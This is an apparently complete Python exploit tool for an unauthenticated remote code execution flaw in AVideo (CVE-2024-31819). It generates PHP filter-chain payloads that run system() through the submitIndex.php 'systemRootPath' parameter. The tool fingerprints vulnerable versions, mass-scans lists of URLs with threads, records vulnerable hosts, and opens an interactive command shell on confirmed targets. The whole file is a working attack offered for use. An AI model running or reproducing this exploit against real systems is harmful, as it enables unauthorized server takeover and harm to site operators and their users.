# README.md
# Rendering markdown...
import re
import requests
import argparse
from packaging import version
from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from php_filter_chain import PHPFilterChainGenerator
from concurrent.futures import ThreadPoolExecutor, as_completed
# Silence urllib3's InsecureRequestWarning: the HTTP calls in this file pass
# verify=False, which would otherwise emit this warning on every request.
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
class AVideoExploit:
def __init__(self, base_url):
self.console = Console()
self.base_url = base_url
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
)
def generate_php_filter_payload(self, command):
generator = PHPFilterChainGenerator()
return generator.generate_filter_chain(command)
def send_payload(self, payload):
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
response = requests.post(
f"{self.base_url}/plugin/WWBNIndex/submitIndex.php",
data={"systemRootPath": payload},
headers=headers,
verify=False,
timeout=10,
)
if response.status_code == 200:
return response.text
else:
return False
except requests.exceptions.RequestException as e:
return False
def parse_output(self, output):
match = re.search(r"\[S\](.*?)\[E\]", output, re.DOTALL)
if match:
return match.group(1).strip()
else:
return None
def interactive_shell(self):
session = PromptSession(history=InMemoryHistory())
while True:
try:
cmd = session.prompt(
HTML("<ansiyellow><b>$ </b></ansiyellow>"), default=""
).strip()
if cmd.lower() == "exit":
break
if cmd.lower() == "clear":
self.console.clear()
continue
php_code = f"<?php echo '[S]';system('{cmd}');echo '[E]';?>"
payload = self.generate_php_filter_payload(php_code)
output = self.send_payload(payload)
if output:
clean_output = self.parse_output(output)
if clean_output:
print(f"{clean_output}\n")
else:
self.custom_print(
"No command output returned or error occurred.", "-"
)
else:
self.custom_print(
"Failed to receive response from the server.", "-"
)
except KeyboardInterrupt:
self.custom_print("Exiting interactive shell...", "!")
break
def check_single_url(self, url):
try:
version_status, avideo_version = self.is_version_vulnerable(url)
if version_status:
php_code = "<?php echo '[S]';system('whoami');echo '[E]';?>"
payload = self.generate_php_filter_payload(php_code)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(
f"{url}/plugin/WWBNIndex/submitIndex.php",
data={"systemRootPath": payload},
headers=headers,
verify=False,
timeout=10,
)
if response.status_code == 200:
output = self.parse_output(response.text)
if output:
return (
f"{url} is vulnerable, Version: {avideo_version}, Command output: {output}\n",
True,
)
return (
f"{url} is not vulnerable or failed to execute command, Version: {avideo_version}\n",
False,
)
elif avideo_version:
return (
f"{url} Version: {avideo_version} is not within the vulnerable range.\n",
False,
)
else:
return (
f"{url} AVideo version could not be determined. Manual check advised.\n",
False,
)
except requests.exceptions.RequestException:
return (f"{url} Request failed.\n", False)
def check_avideo_version(self, url):
try:
response = requests.get(url, verify=False, timeout=10)
version_pattern = re.compile("Powered by AVideo ® Platform v([\d.]+)")
match = version_pattern.search(response.text)
if match:
return match.group(1)
comment_version_pattern = re.compile(r"<!--.*?v:([\d.]+).*?-->", re.DOTALL)
comment_match = comment_version_pattern.search(response.text)
if comment_match:
return comment_match.group(1)
except requests.exceptions.RequestException as e:
return None
def is_version_vulnerable(self, url):
avideo_version_str = self.check_avideo_version(url)
if avideo_version_str is None:
return True, "unknown"
parsed_version = version.parse(avideo_version_str)
if isinstance(parsed_version, version.Version):
is_vulnerable = (
version.parse("12.4") <= parsed_version <= version.parse("14.2")
)
return is_vulnerable, avideo_version_str
else:
return True, avideo_version_str
def check_urls_and_write_output(self, urls, max_workers, output_path):
with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar(
len(urls), enrich_print=False
) as bar:
futures = {executor.submit(self.check_single_url, url): url for url in urls}
for future in as_completed(futures):
result, is_vulnerable = future.result()
if is_vulnerable:
self.custom_print(result, "+")
if output_path:
with open(output_path, "a") as file:
file.write(result)
bar()
if output_path:
print(f"Results written to {output_path}")
def main():
    """Parse the command line and run either single-target or batch mode.

    With ``-u`` the target's version is reported first; the check is skipped
    when the detected version is outside the affected range, and a confirmed
    result opens the interactive prompt. With only ``-f`` every line of the
    file is checked through the thread pool.
    """
    cli = argparse.ArgumentParser(
        description="AVideo CVE-2024-31819 - Unauthenticated Remote Code Execution"
    )
    cli.add_argument("-u", "--url", help="Base URL for single target", default=None)
    cli.add_argument("-f", "--file", help="File containing list of URLs", default=None)
    cli.add_argument(
        "-t", "--threads", help="Number of threads to use", type=int, default=20
    )
    cli.add_argument("-o", "--output", help="Output file to save results", default=None)
    options = cli.parse_args()

    if not (options.url or options.file):
        print(
            "Error: No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs."
        )
        return

    client = AVideoExploit(options.url)

    # Batch mode: reached only when no single URL was given.
    if not options.url:
        with open(options.file, "r") as handle:
            targets = handle.read().splitlines()
        client.check_urls_and_write_output(targets, options.threads, options.output)
        return

    # Single-target mode: report the detected version before checking.
    in_range, detected = client.is_version_vulnerable(options.url)
    if detected == "unknown":
        client.custom_print(
            "Unable to determine AVideo version. Proceeding with vulnerability check as a precaution.",
            "!",
        )
    elif in_range:
        client.custom_print(
            f"Version {detected} is within the vulnerable range. Proceeding with vulnerability check.",
            "+",
        )
    else:
        client.custom_print(
            f"Version {detected} is not within the vulnerable range. Detected version: {detected}",
            "-",
        )
        return

    report, confirmed = client.check_single_url(options.url)
    if not confirmed:
        client.custom_print(
            "The URL is not vulnerable or failed to execute the command.", "-"
        )
        return

    client.custom_print(report, "+")
    client.interactive_shell()


if __name__ == "__main__":
    main()